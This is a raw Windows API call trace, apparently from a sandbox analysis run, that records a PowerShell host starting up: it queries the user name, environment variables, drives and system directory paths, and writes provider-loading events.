	[0485.440] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0485.440] CoTaskMemFree (pv=0x207ef0) 
	[0485.440] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f45a00*="Environment", lpRawData=0x2f45790) returned 1
	[0485.441] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.441] CoTaskMemFree (pv=0x252be0) 
	[0485.442] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.442] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0485.442] CoTaskMemFree (pv=0x252be0) 
	[0485.442] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.442] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0485.442] CoTaskMemFree (pv=0x252be0) 
	[0485.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0485.443] SetErrorMode (uMode=0x1) returned 0x1
	[0485.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d2c0 | out: lpFileInformation=0x16d2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0485.443] SetErrorMode (uMode=0x1) returned 0x1
	[0485.444] GetLogicalDrives () returned 0x4
	[0485.445] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.446] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0485.446] SetErrorMode (uMode=0x1) returned 0x1
	[0485.447] CoTaskMemAlloc (cb=0x68) returned 0x2729a0
	[0485.447] CoTaskMemAlloc (cb=0x68) returned 0x272930
	[0485.447] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2729a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d290, lpMaximumComponentLength=0x16d28c, lpFileSystemFlags=0x16d288, lpFileSystemNameBuffer=0x272930, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d290*=0x9c354b42, lpMaximumComponentLength=0x16d28c*=0xff, lpFileSystemFlags=0x16d288*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0485.447] CoTaskMemFree (pv=0x2729a0) 
	[0485.447] CoTaskMemFree (pv=0x272930) 
	[0485.447] SetErrorMode (uMode=0x1) returned 0x1
	[0485.447] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0485.448] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.448] SetErrorMode (uMode=0x1) returned 0x1
	[0485.448] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d230 | out: lpFileInformation=0x16d230*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0485.448] SetErrorMode (uMode=0x1) returned 0x1
	[0485.448] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.448] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0485.449] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.449] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0485.449] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.449] SetErrorMode (uMode=0x1) returned 0x1
	[0485.449] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0485.449] SetErrorMode (uMode=0x1) returned 0x1
	[0485.449] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.449] SetErrorMode (uMode=0x1) returned 0x1
	[0485.450] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0485.450] SetErrorMode (uMode=0x1) returned 0x1
	[0485.450] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0485.450] SetErrorMode (uMode=0x1) returned 0x1
	[0485.450] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d100 | out: lpFileInformation=0x16d100*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0485.450] SetErrorMode (uMode=0x1) returned 0x1
	[0485.450] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0485.450] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0485.451] CoTaskMemFree (pv=0x1b81d800) 
	[0485.451] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0485.451] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0485.451] CoTaskMemFree (pv=0x207ef0) 
	[0485.451] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4caf0*="FileSystem", lpRawData=0x2f4c880) returned 1
	[0485.452] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.452] CoTaskMemFree (pv=0x252be0) 
	[0485.453] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0485.453] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0485.454] CoTaskMemFree (pv=0x1b81d800) 
	[0485.454] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0485.454] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0485.454] CoTaskMemFree (pv=0x207ef0) 
	[0485.454] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f52330*="Function", lpRawData=0x2f520c0) returned 1
	[0485.455] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.455] CoTaskMemFree (pv=0x252be0) 
	[0485.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0485.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0485.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0485.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0486.302] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0486.302] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0486.302] CoTaskMemFree (pv=0x1b81d800) 
	[0486.302] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0486.302] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0486.303] CoTaskMemFree (pv=0x207ef0) 
	[0486.303] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f74b58*="Registry", lpRawData=0x2f748e8) returned 1
	[0487.069] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0487.069] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0487.069] CoTaskMemFree (pv=0x1b81d800) 
	[0487.069] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0487.069] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0487.069] CoTaskMemFree (pv=0x207ef0) 
	[0487.070] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f79f70*="Variable", lpRawData=0x2f79d00) returned 1
	[0487.071] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0487.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.072] CoTaskMemFree (pv=0x252be0) 
	[0487.073] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0487.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.073] CoTaskMemFree (pv=0x252be0) 
	[0487.953] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0487.953] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0487.953] CoTaskMemFree (pv=0x1b81d800) 
	[0487.953] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0487.953] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0487.953] CoTaskMemFree (pv=0x207ef0) 
	[0487.954] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8ddc8*="Certificate", lpRawData=0x2f8db58) returned 1
	[0488.775] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0488.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.776] CoTaskMemFree (pv=0x252be0) 
	[0488.779] GetLogicalDrives () returned 0x4
	[0488.779] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0488.780] CoTaskMemAlloc (cb=0x20e) returned 0x259fa0
	[0488.780] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x259fa0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0488.780] CoTaskMemFree (pv=0x259fa0) 
	[0488.792] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0488.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.793] CoTaskMemFree (pv=0x252be0) 
	[0488.793] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0488.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.793] CoTaskMemFree (pv=0x252be0) 
	[0489.637] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0489.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0489.637] CoTaskMemFree (pv=0x252be0) 
	[0489.638] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0489.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0489.638] CoTaskMemFree (pv=0x252be0) 
	[0489.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.639] SetErrorMode (uMode=0x1) returned 0x1
	[0489.639] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d150 | out: lpFileInformation=0x16d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.639] SetErrorMode (uMode=0x1) returned 0x1
	[0489.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.639] SetErrorMode (uMode=0x1) returned 0x1
	[0489.640] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d150 | out: lpFileInformation=0x16d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.640] SetErrorMode (uMode=0x1) returned 0x1
	[0489.640] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0489.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0489.640] CoTaskMemFree (pv=0x252be0) 
	[0489.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.646] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0489.646] SetErrorMode (uMode=0x1) returned 0x1
	[0489.646] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d110 | out: lpFileInformation=0x16d110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0489.646] SetErrorMode (uMode=0x1) returned 0x1
	[0489.646] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0489.646] SetErrorMode (uMode=0x1) returned 0x1
	[0489.647] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d110 | out: lpFileInformation=0x16d110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0489.647] SetErrorMode (uMode=0x1) returned 0x1
	[0489.647] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0489.647] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0489.647] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.647] SetErrorMode (uMode=0x1) returned 0x1
	[0489.647] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d110 | out: lpFileInformation=0x16d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0489.647] SetErrorMode (uMode=0x1) returned 0x1
	[0489.647] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.647] SetErrorMode (uMode=0x1) returned 0x1
	[0489.648] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d110 | out: lpFileInformation=0x16d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0489.648] SetErrorMode (uMode=0x1) returned 0x1
	[0489.648] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.648] SetErrorMode (uMode=0x1) returned 0x1
	[0489.648] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d110 | out: lpFileInformation=0x16d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.648] SetErrorMode (uMode=0x1) returned 0x1
	[0489.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.649] SetErrorMode (uMode=0x1) returned 0x1
	[0489.649] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d110 | out: lpFileInformation=0x16d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.649] SetErrorMode (uMode=0x1) returned 0x1
	[0489.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.649] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.649] SetErrorMode (uMode=0x1) returned 0x1
	[0489.649] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d150 | out: lpFileInformation=0x16d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0489.650] SetErrorMode (uMode=0x1) returned 0x1
	[0489.650] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.650] SetErrorMode (uMode=0x1) returned 0x1
	[0489.650] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d150 | out: lpFileInformation=0x16d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0489.650] SetErrorMode (uMode=0x1) returned 0x1
	[0489.650] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0489.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.650] SetErrorMode (uMode=0x1) returned 0x1
